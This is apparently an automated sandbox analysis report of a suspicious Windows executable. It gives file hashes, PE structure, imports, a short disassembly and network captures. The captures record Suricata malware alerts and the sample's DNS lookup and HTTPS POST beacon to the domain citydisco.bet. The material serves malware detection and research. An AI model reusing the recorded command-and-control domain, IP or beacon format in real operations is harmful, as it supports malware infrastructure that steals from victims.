SHA1:	BCE69B6D343420CACC140EF168FEA9159D23639B
SHA-256:	A2A635CB14C8223B112822E6777B05DBA5548D9797B08C4CB94836BFB35FC6DB
SHA-512:	31771352FB4E6EDA2C75563E04E16E26B26B9A9747ACA6509965BE434401A399973DA332F555A905120F89E347F82CE65B6C30FD9D043070667524E19262B11E
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....d...............................................................................................................................................................................................................................................................................................................................................^i..HvLE.^......G...........i.rUJ...I.B.).,D.................P.......p... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........N...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.695487320716704
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setupx 2.exe1.exe
File size:	1'385'984 bytes
MD5:	fcebf765658ef7adabf6a5b1cc1384f6
SHA1:	705760f3154799ba9ce17f27dc22bcdc1f519526
SHA256:	62a29296217254a2236699307ebf64d245aeb14c38f85fc714e161d4f2961bf6
SHA512:	7ead2850272f3e22bcbee58a3e2e807ace66a39e5563f1f21b0adffd68727f35dc9a584578545ad51546247f5747930e09508bad298c5f6cf34fb5e87c378ddb
SSDEEP:	24576:5Ai/c6dNtEWZ4B+UsxoxbzmXpnmxBA4CRLnm9INN3TnmxBA4CRLnm9INN3:X0qNtnKB+UsxoxbzYpmrQRCiNZTmrQRd
TLSH:	5A55E07270C1C173FA81A5B23598E3B5046BF672DA2D4FC7E2B4E3755048AC11BAA52F
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........................................@..........................0............@.................................06..<..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46e682
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D09BB6 [Tue Mar 11 20:23:18 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d462aa757f68629e41b3df6e6d4c6a3c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007FAE5CB550FAh
jmp 00007FAE5CB54F69h
mov ecx, dword ptr [00496840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FAE5CB550F6h
test esi, ecx
jne 00007FAE5CB55118h
call 00007FAE5CB55121h
mov ecx, eax
cmp ecx, edi
jne 00007FAE5CB550F9h
mov ecx, BB40E64Fh
jmp 00007FAE5CB55100h
test esi, ecx
jne 00007FAE5CB550FCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00496840h], ecx
not ecx
pop edi
mov dword ptr [00496880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00493864h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00493824h]
xor dword ptr [ebp-04h], eax
call dword ptr [00493820h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [004938ACh]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00498490h
call dword ptr [00493884h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007FAE5CB5BC45h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93630	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x99e00	0x4540
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0x435c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8fb28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8bf98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x937c0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x89ad0	0x89c00	0bd698a1f44cc91b018d0fe5240109ab	False	0.5286942774500908	data	7.09207256696417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8b000	0xa034	0xa200	383899a836f6650ba73e1556e24d0e62	False	0.4230806327160494	data	4.888147649186249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x96000	0x2c5c	0x1600	233e04c81724f6e0f553a5dbb15f0a09	False	0.4073153409090909	data	4.744840434225013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x99000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x9a000	0x435c	0x4400	b181df1a2af7bbd01ea74e454a21e7ba	False	0.7916475183823529	data	6.714823432652306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x9f000	0x5a000	0x5a000	ea508351f81fa7129f5686d08afb1301	False	1.0003282335069446	OpenPGP Public Key	7.99948266317738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xf9000	0x5a000	0x5a000	ea508351f81fa7129f5686d08afb1301	False	1.0003282335069446	OpenPGP Public Key	7.99948266317738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

ole32.dll

OleDraw

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T13:33:32.389864+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49681	188.114.96.3	443	TCP
2025-03-13T13:33:35.101198+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49683	188.114.96.3	443	TCP
2025-03-13T13:33:37.353080+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49685	188.114.96.3	443	TCP
2025-03-13T13:33:39.731640+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49689	188.114.96.3	443	TCP
2025-03-13T13:33:42.135561+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49690	188.114.96.3	443	TCP
2025-03-13T13:33:44.899497+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49691	188.114.96.3	443	TCP
2025-03-13T13:33:49.081729+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49693	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:33:31.233860016 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:31.233911037 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:31.233975887 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:31.238826036 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:31.238847017 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:32.389775991 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:32.389863968 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:32.394582033 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:32.394598961 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:32.394943953 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:32.439450026 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:32.503119946 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:32.503163099 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:32.503278971 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331289053 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331331015 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331376076 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331389904 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.331417084 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331470966 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.331562042 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331617117 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.331695080 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.331703901 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.334134102 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.334166050 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.334175110 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.334181070 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.334220886 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.334448099 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.334461927 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.334498882 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.334510088 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.376903057 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.418104887 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.418193102 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.418252945 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.419055939 CET	49681	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.419083118 CET	443	49681	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.644742966 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.644781113 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:33.644867897 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.645296097 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:33.645307064 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:35.101084948 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:35.101197958 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:35.111989975 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:35.112009048 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:35.112266064 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:35.113728046 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:35.114248991 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:35.114272118 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:35.982000113 CET	443	49683	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:35.982451916 CET	49683	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:36.122317076 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:36.122375965 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:36.122447014 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:36.122818947 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:36.122833014 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:37.352997065 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:37.353080034 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:37.354636908 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:37.354651928 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:37.354898930 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:37.364506960 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:37.364722013 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:37.364748955 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:37.364837885 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:37.364849091 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:38.187575102 CET	443	49685	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:38.187892914 CET	49685	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:38.439157009 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:38.439196110 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:38.439287901 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:38.439743042 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:38.439757109 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:39.731549025 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:39.731640100 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:39.733140945 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:39.733153105 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:39.733421087 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:39.742857933 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:39.743065119 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:39.743175983 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:39.743263960 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:39.743263960 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:39.743273973 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:39.784328938 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:40.583879948 CET	443	49689	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:40.584367990 CET	49689	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:40.987958908 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:40.987998962 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:40.988087893 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:40.988481998 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:40.988497019 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:42.135435104 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:42.135560989 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:42.137434959 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:42.137449026 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:42.137716055 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:42.139801025 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:42.140033007 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:42.140063047 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:42.925987005 CET	443	49690	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:42.926352978 CET	49690	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:43.390399933 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:43.390439987 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:43.390609026 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:43.390996933 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:43.391011000 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.899257898 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.899497032 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.900989056 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.900998116 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.901242971 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.911401033 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.912278891 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.912322998 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.912431955 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.912457943 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.912565947 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.912594080 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.912718058 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.912743092 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.912894964 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.912914991 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913043976 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913074970 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913089037 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913213015 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913222075 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913230896 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913234949 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913280010 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913357019 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913395882 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913434982 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913460970 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913502932 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913533926 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:44.913538933 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:44.913585901 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:47.768009901 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:47.768124104 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:47.768239975 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:47.768430948 CET	49691	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:47.768446922 CET	443	49691	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:47.801002979 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:47.801040888 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:47.801151991 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:47.801525116 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:47.801544905 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.081490993 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.081728935 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.083087921 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.083096981 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.083333015 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.084590912 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.084857941 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.084877968 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902353048 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902403116 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902436018 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902451992 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.902481079 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902551889 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902585030 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.902621984 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.902622938 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.902632952 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.909044981 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.909087896 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.909152031 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.909178972 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.909240007 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.912870884 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.912870884 CET	49693	443	192.168.2.7	188.114.96.3
Mar 13, 2025 13:33:49.912899017 CET	443	49693	188.114.96.3	192.168.2.7
Mar 13, 2025 13:33:49.912911892 CET	443	49693	188.114.96.3	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:33:31.213416100 CET	50388	53	192.168.2.7	1.1.1.1
Mar 13, 2025 13:33:31.226982117 CET	53	50388	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 13:33:31.213416100 CET	192.168.2.7	1.1.1.1	0xd52a	Standard query (0)	citydisco.bet	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 13:33:31.226982117 CET	1.1.1.1	192.168.2.7	0xd52a	No error (0)	citydisco.bet		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:33:31.226982117 CET	1.1.1.1	192.168.2.7	0xd52a	No error (0)	citydisco.bet		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

citydisco.bet

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49681	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:32 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: citydisco.bet
2025-03-13 12:33:32 UTC	61	OUT	Data Raw: 75 69 64 3d 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 26 63 69 64 3d Data Ascii: uid=a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac&cid=
2025-03-13 12:33:33 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:33 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STiNCTL%2FRjntjOGBf73pCJbhrKw1M6X4UgddZmTpMO3Fwu6HmmRowLqVLEyNuhtKHQTgXNViTQfy4ifPr2tkRpYDmc00AYZRAQ9RwMG8XzCL06io2yrweNOIt6XlTc1%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f732ebbe578-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13710&min_rtt=13682&rtt_var=3897&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=960&delivery_rate=209763&cwnd=250&unsent_bytes=0&cid=e2a017a486ed9b7e&ts=886&x=0"
